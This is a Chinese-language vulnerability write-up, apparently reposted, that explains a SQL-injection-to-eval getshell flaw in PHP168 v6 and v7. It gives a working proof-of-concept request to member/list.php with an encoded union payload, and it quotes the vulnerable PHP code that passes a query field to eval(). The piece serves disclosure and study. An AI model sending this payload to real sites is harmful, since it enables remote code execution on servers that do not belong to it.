PHP168 V6与V7版本鸡肋获取服务器Shell安全漏洞技术分析
PHP168v6 v7存在SQL注入结合eval的Getshell漏洞。需网站开启真静态并允许会员注册两个条件,攻击者通过构造恶意aidDB参数,在member list php中触发未过滤的SQL拼接,查询结果中的bencandy_html字段被直接eval执行,可导致任意代码执行。
最近在一次安全审计中发现一处SQL注入漏洞,与之前公开的某个漏洞属于同一类型,但利用条件更为严格——需要满足两个前提:网站需开启文章生成真静态功能,且允许用户注册成为会员。
以下为针对v6版本的漏洞验证代码,直接提交后将执行phpinfo()函数。v7版本原理完全相同,仅数据库字段数量有所差异:
member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7B247B706870696E666F28297D7D,6,7%23
0x01 漏洞关键点:make_more_article_html 函数
该漏洞的核心问题出现在此函数中,关键代码如下:
function make_more_article_html($comebackurl='/',$type='',$aidDB=''){
global $db,$pre,$webdb,$webdb,$showHtml_Type;
if($webdb[NewsMakeHtml]!=1||$aidDB=='') // $webdb[NewsMakeHtml] 必须为真静态
{ return ;}
...
$query = $db->query("SELECT A.*,B.bencandy_html,B.list_html,D.aid FROM {$pre}article_db D LEFT JOIN {$pre}article A ON D.aid=A.aid LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE D.aid IN ($string)");
while($rs = $db->fetch_array($query)){
...
$filename_b=$rs[bencandy_html];
...
eval("\$showurl=\"$filename_b\";");
...
}
漏洞的核心在于:$string 由 $aidDB 直接拼接至SQL查询语句,而 $aidDB 参数未经过任何安全过滤。更为严重的是,查询结果中的 bencandy_html 字段值随后被直接传入 eval() 执行——只要攻击者能在 $aidDB 中注入恶意数据,即可控制查询结果,进而通过 eval 执行任意PHP代码,实现远程代码执行。
0x02 触发入口:member/list.php
在 \member\list.php 文件中,当 step==2 且 Type=='delete' 时,该危险函数被直接调用:
if($step==2){
...
if($Type=='delete'){
make_more_article_html("$FROMURL","del_0",$aidDB);
}
}
换言之,攻击者只需构造一个包含恶意 aidDB[] 参数的请求,同时网站满足真静态和允许注册两个条件,即可触发SQL注入。尽管利用门槛相对较高,但一旦成功获取webshell,将对网站造成毁灭性打击。
游乐网为非赢利性网站,所展示的游戏/软件/文章内容均来自于互联网或第三方用户上传分享,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系youleyoucom@outlook.com。
同类文章
DDoS攻击的三大主要形式:原理、特征与防御重点
DDoS攻击主要分为基于流量(Volume)、基于应用层(Application)和基于协议(Protocol)三种形式。流量型攻击通过海量数据淹没带宽;应用层攻击利用Web漏洞耗尽服务器资源;协议层攻击则利用TCP握手缺陷导致系统挂起。了解这些原理是制定针对性防御策略的基础。
如何有效预防和缓解DDoS攻击:5大核心策略详解
面对DDoS攻击,单纯增加带宽已非长久之计。本文详解5大核心防护策略:优化网络硬件配置、建立DNS冗余机制、部署透明缓解技术、引入负载平衡器及专用Anti-DDoS模块。通过合理组合这些技术手段,可有效抵御SYN泛洪、Slowloris等常见攻击,保障业务连续性与网站可用性。
DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析
许多企业误以为CDN、防火墙或黑名单能完全抵御DDoS攻击。本文深入解析四大常见误区:CDN仅提供部分缓解、静态黑名单易失效、防火墙算力有限且可能成为目标、阈值警报仅具滞后性。了解这些局限性,有助于构建更立体的防御体系,避免在攻击发生时措手不及。
常见DDoS攻击类型详解:原理、特征与防御策略
本文详细解析四种常见DDoS攻击类型:SYN Flood利用TCP三次握手缺陷耗尽资源;UDP Flood通过海量数据包造成带宽拥塞;ICMP Flood利用Ping请求消耗系统算力;应用层Flood针对Web脚本进行高频请求。了解其原理是制定有效防御策略的基础。
如何有效抵御DDOS攻击:4种核心防护方案解析
面对DDOS攻击,企业需构建多层防护体系。本文详解四大核心策略:利用反向路由器查询进行流量清洗,通过GCDN智能分配节点隐藏源站IP,部署负载均衡硬件分担压力,以及接入高防机房抵御数百G恶意流量。掌握这些技术,可最大程度保障业务连续性。
- 热门数据榜
相关攻略
2026-08-31 11:56
2026-08-31 11:56
2026-08-31 11:55
2026-08-31 11:55
2026-08-31 11:54
2026-08-31 11:53
2026-08-31 11:53
2026-08-31 11:53
热门教程
- 游戏攻略
- 安卓教程
- 苹果教程
- 电脑教程

